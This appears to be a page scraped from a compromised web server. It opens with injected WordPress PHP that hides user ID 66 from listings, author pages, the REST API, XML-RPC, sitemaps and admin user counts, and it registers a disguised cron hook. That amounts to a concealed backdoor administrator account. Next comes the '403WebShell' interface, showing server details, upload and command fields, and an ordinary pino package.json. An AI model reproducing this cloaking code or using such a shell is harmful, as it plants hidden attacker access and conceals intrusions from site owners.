add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/openskillpaths/node_modules/pino/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/openskillpaths/node_modules/pino/package.json
{
  "name": "pino",
  "version": "10.3.1",
  "description": "super fast, all natural json logger",
  "main": "pino.js",
  "type": "commonjs",
  "types": "pino.d.ts",
  "browser": "./browser.js",
  "scripts": {
    "borp": "borp --timeout 60000 --coverage --check-coverage --lines 95 --functions 95 --branches 95 --statements 95",
    "docs": "docsify serve",
    "browser-test": "airtap --local 8080 test/browser*test.js",
    "lint": "eslint .",
    "prepublishOnly": "node test/internals/version.test.js",
    "test": "npm run lint && npm run transpile && npm run borp && jest test/jest && npm run test-types",
    "test-ci": "npm run lint && npm run transpile && npm run borp && npm run test-types",
    "test-ci-pnpm": "pnpm run lint && npm run transpile && borp --timeout 60000 && pnpm run test-types",
    "test-ci-yarn-pnp": "yarn run lint && npm run transpile && borp --timeout 60000",
    "test-types": "tsc && tsd && ts-node test/types/pino.ts && attw --pack .",
    "test:smoke": "smoker smoke:pino && smoker smoke:browser && smoker smoke:file",
    "smoke:pino": "node ./pino.js",
    "smoke:browser": "node ./browser.js",
    "smoke:file": "node ./file.js",
    "transpile": "node ./test/fixtures/ts/transpile.cjs",
    "cov-ui": "tap --ts --coverage-report=html",
    "bench": "node benchmarks/utils/runbench all",
    "bench-basic": "node benchmarks/utils/runbench basic",
    "bench-object": "node benchmarks/utils/runbench object",
    "bench-deep-object": "node benchmarks/utils/runbench deep-object",
    "bench-multi-arg": "node benchmarks/utils/runbench multi-arg",
    "bench-long-string": "node benchmarks/utils/runbench long-string",
    "bench-child": "node benchmarks/utils/runbench child",
    "bench-child-child": "node benchmarks/utils/runbench child-child",
    "bench-child-creation": "node benchmarks/utils/runbench child-creation",
    "bench-formatters": "node benchmarks/utils/runbench formatters",
    "update-bench-doc": "node benchmarks/utils/generate-benchmark-doc > docs/benchmarks.md"
  },
  "bin": {
    "pino": "./bin.js"
  },
  "precommit": "test",
  "repository": {
    "type": "git",
    "url": "git+https://github.com/pinojs/pino.git"
  },
  "keywords": [
    "fast",
    "logger",
    "stream",
    "json"
  ],
  "author": "Matteo Collina <hello@matteocollina.com>",
  "contributors": [
    "David Mark Clements <huperekchuno@googlemail.com>",
    "James Sumners <james.sumners@gmail.com>",
    "Thomas Watson Steen <w@tson.dk> (https://twitter.com/wa7son)"
  ],
  "license": "MIT",
  "bugs": {
    "url": "https://github.com/pinojs/pino/issues"
  },
  "homepage": "https://getpino.io",
  "devDependencies": {
    "@arethetypeswrong/cli": "^0.18.1",
    "@matteo.collina/tspl": "^0.2.0",
    "@types/flush-write-stream": "^1.0.0",
    "@types/node": "^25.0.3",
    "airtap": "5.0.0",
    "bole": "^5.0.5",
    "borp": "^0.21.0",
    "bunyan": "^1.8.14",
    "debug": "^4.3.4",
    "docsify-cli": "^4.4.4",
    "eslint": "^9.37.0",
    "eslint-plugin-import": "^2.26.0",
    "eslint-plugin-n": "17.23.2",
    "eslint-plugin-node": "^11.1.0",
    "eslint-plugin-promise": "^6.0.0",
    "execa": "^5.0.0",
    "fastbench": "^1.0.1",
    "flush-write-stream": "^2.0.0",
    "import-fresh": "^3.2.1",
    "jest": "^30.0.3",
    "log": "^6.0.0",
    "loglevel": "^1.6.7",
    "midnight-smoker": "1.1.1",
    "neostandard": "^0.12.2",
    "pino-pretty": "^13.0.0",
    "pre-commit": "^1.2.2",
    "proxyquire": "^2.1.3",
    "pump": "^3.0.0",
    "rimraf": "^6.0.1",
    "semver": "^7.3.7",
    "split2": "^4.0.0",
    "steed": "^1.1.3",
    "strip-ansi": "^6.0.0",
    "tape": "^5.5.3",
    "through2": "^4.0.0",
    "ts-node": "^10.9.1",
    "tsd": "^0.33.0",
    "typescript": "~5.9.2",
    "winston": "^3.7.2"
  },
  "dependencies": {
    "atomic-sleep": "^1.0.0",
    "on-exit-leak-free": "^2.1.0",
    "pino-abstract-transport": "^3.0.0",
    "pino-std-serializers": "^7.0.0",
    "process-warning": "^5.0.0",
    "quick-format-unescaped": "^4.0.3",
    "real-require": "^0.2.0",
    "safe-stable-stringify": "^2.3.1",
    "@pinojs/redact": "^0.4.0",
    "sonic-boom": "^4.0.1",
    "thread-stream": "^4.0.0"
  },
  "tsd": {
    "directory": "test/types"
  }
}

Youez - 2016 - github.com/yon3zu
LinuXploit